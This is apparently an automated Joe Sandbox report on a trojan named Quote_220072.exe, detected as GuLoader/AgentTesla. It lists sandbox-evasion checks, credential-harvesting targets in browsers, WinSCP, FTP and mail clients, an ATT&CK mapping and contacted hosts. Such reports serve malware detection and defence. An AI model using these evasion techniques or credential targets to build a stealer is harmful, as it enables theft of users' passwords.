Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Quote_220072.exe

Code function: 0_2_6FF82351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FF82351

Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377E1A28 pushfd ; ret		5_2_377E1A2B
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 5_2_377E19EE pushfd ; ret		5_2_377E19F1

Source: C:\Users\user\Desktop\Quote_220072.exe

File created: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\Desktop\Quote_220072.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Quote_220072.exe	API/Special instruction interceptor: Address: 5BF8E40
Source: C:\Users\user\Desktop\Quote_220072.exe	API/Special instruction interceptor: Address: 27B8E40

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\Quote_220072.exe	RDTSC instruction interceptor: First address: 5BA014C second address: 5BA014C instructions: 0x00000000 rdtsc 0x00000002 test ebx, 6315EE0Eh 0x00000008 test bh, bh 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F27F4CC3B9Fh 0x0000000e test dx, ax 0x00000011 inc ebp 0x00000012 inc ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Quote_220072.exe	RDTSC instruction interceptor: First address: 276014C second address: 276014C instructions: 0x00000000 rdtsc 0x00000002 test ebx, 6315EE0Eh 0x00000008 test bh, bh 0x0000000a cmp ebx, ecx 0x0000000c jc 00007F27F4C8B41Fh 0x0000000e test dx, ax 0x00000011 inc ebp 0x00000012 inc ebx 0x00000013 rdtsc

Source: C:\Users\user\Desktop\Quote_220072.exe	Memory allocated: 34880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Memory allocated: 348A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Memory allocated: 368A0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

Window / User API: threadDelayed 4030

Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\Quote_220072.exe

Evaded block: after key decision

graph_0-3126

Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8060	Thread sleep count: 252 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8060	Thread sleep count: 4030 > 30	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -99531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -99422s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -99313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -98953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -98844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -98719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -98610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -98485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -98360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -98235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -98110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -97985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -97860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe TID: 8064	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\Desktop\Quote_220072.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Quote_220072.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 0_2_004066F7 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,		0_2_004066F7
Source: C:\Users\user\Desktop\Quote_220072.exe	Code function: 0_2_004065AD FindFirstFileW,FindClose,		0_2_004065AD

Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 99531	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 99313	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 98844	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 98719	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 98610	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 98485	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 98360	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 98235	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 98110	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 97985	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 97860	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: Quote_220072.exe, 00000005.00000002.2567555318.000000000438D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.0000000004338000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Quote_220072.exe

API call chain: ExitProcess graph end node

graph_0-3014

Source: C:\Users\user\Desktop\Quote_220072.exe

Code function: 0_2_6FF82351 GlobalFree,GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6FF82351

Source: C:\Users\user\Desktop\Quote_220072.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

Process created: C:\Users\user\Desktop\Quote_220072.exe "C:\Users\user\Desktop\Quote_220072.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe	Queries volume information: C:\Users\user\Desktop\Quote_220072.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Quote_220072.exe

0_2_004036DA

Source: C:\Users\user\Desktop\Quote_220072.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quote_220072.exe PID: 7888, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Quote_220072.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Quote_220072.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Quote_220072.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Quote_220072.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\Quote_220072.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quote_220072.exe PID: 7888, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Quote_220072.exe PID: 7888, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	1 Masquerading	2 OS Credential Dumping	311 Security Software Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	1 Credentials in Registry	141 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	141 Virtualization/Sandbox Evasion	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	2 Data from Local System	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Access Token Manipulation	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	225 System Information Discovery	SSH	Keylogging	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quote_220072.exe	55%	ReversingLabs	Win32.Trojan.GuLoader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsi6AEA.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://apis.google.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.18.14	true	false	unknown
drive.usercontent.google.com	142.250.185.193	true	false	unknown
mail.mbarieservicesltd.com	199.79.62.115	true	true	unknown
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	84.201.210.22	true	false	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.google.com	Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/y	Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/	Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775266109.00000000043E0000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://apis.google.com	Quote_220072.exe, 00000005.00000003.1736979105.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1737066046.00000000043A7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_Error...	Quote_220072.exe	false		unknown
https://drive.google.com/	Quote_220072.exe, 00000005.00000002.2567555318.0000000004338000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/t	Quote_220072.exe, 00000005.00000003.1746407195.00000000043A7000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000002.2567555318.000000000439D000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775284184.00000000043A4000.00000004.00000020.00020000.00000000.sdmp, Quote_220072.exe, 00000005.00000003.1775200701.000000000439D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://mail.mbarieservicesltd.com	Quote_220072.exe, 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.185.193	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
199.79.62.115	mail.mbarieservicesltd.com	United States	394695	PUBLIC-DOMAIN-REGISTRYUS	true
172.217.18.14	drive.google.com	United States	15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1546663
Start date and time:	2024-11-01 12:14:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quote_220072.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/12@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 57 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Quote_220072.exe

Simulations

Behavior and APIs

Time	Type	Description
07:15:43	API Interceptor	19x Sleep call for process: Quote_220072.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
199.79.62.115	TT Copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	24-17745.exe	Get hash	malicious	AgentTesla	Browse
	PO# 4507573387.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse
	PO-000041522.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	MA2402201136.exe	Get hash	malicious	AgentTesla	Browse
	IMG0001.exe	Get hash	malicious	AgentTesla	Browse
	PURCHASE ORDER-6350-2024.exe	Get hash	malicious	AgentTesla	Browse
	order2024-10-07_174915.exe	Get hash	malicious	AgentTesla	Browse
	PO23100070.exe	Get hash	malicious	AgentTesla	Browse
	PO-000001488.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mail.mbarieservicesltd.com	TT Copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
	24-17745.exe	Get hash	malicious	AgentTesla	Browse	199.79.62.115
	PO# 4507573387.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	199.79.62.115
	PO-000041522.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	199.79.62.115
